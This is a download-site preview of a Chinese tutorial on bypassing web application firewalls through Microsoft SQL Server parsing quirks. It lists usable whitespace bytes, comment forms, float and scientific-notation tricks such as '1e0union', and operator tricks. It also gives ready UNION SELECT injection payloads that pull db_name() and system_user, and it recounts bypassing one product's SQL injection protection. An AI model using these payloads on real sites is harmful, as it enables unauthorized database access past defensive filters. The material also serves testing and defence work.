没有合适的资源?快使用搜索试试~ 我知道了~
第02篇:WAF Bypass数据库特性(MSsql探索篇)1
需积分: 0 0 下载量 24 浏览量
2022-08-03
12:13:20
上传
评论
收藏 296KB PDF 举报
温馨提示
试读
4页
(1)空白字符 (2)注释符号 (3)浮点数 (4)1E0的形式: (5)运算符 (6)小区别: (1)空白字符 (2)注释符号 (3)其他符号 (1)空白字符
资源推荐
资源详情
资源评论
0x01前言
我们经常利用一些数据库特性来进行WAF绕过。在MSSQL中,比如可以这样:
通过1.e这样的形式,我曾用它绕过了D盾的SQL注入防护,通过简单的Fuzz,我们来一起探索一下MSsql特性。
0x02 测试
常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()
【位置四】from【位置五】admin
位置一:参数和union之间的位置
(1)空白字符
Mssql可以利用的空白字符有:
01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,
20
(2)注释符号
Mssql也可以使用注释符号 /**/
(3)浮点数
select * from admin where id=1.1union select 1,'2',db_name() from admin
(4)1E0的形式:
select * from admin where id=1e0union select 1,'2',db_name() from admin
(5)运算符
包括加(+)、减(-)、乘(*)、除(/)、求于(%)、位与(&)、位或(|)、位异或(^)
select username,password,id from admin where id=1-1union select '1',system_user,3 from admin
select username,password,id from admin where id=1e-union select '1',system_user,3 from admin
(6)小区别:
ASPX:[0x00-0x20]、ox2e、[0x30-0x39]、ox45、ox65、[0x80-0xff]、运算符
ASP: [0x01-0x20]、ox2e、[0x30-0x39]、ox45、ox65、运算符
单引号:select username,password,id from admin where id=1 and '1'like'1'union select null,null,null
位置二:union和select之间的位置
(1)空白字符
浮点数形式:id=1.1union select
科学计数法形式:id=1e0union select
但其实还可以这样子:id=1.eunion select
资源评论
扈涧盛
- 粉丝: 26
- 资源: 319
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功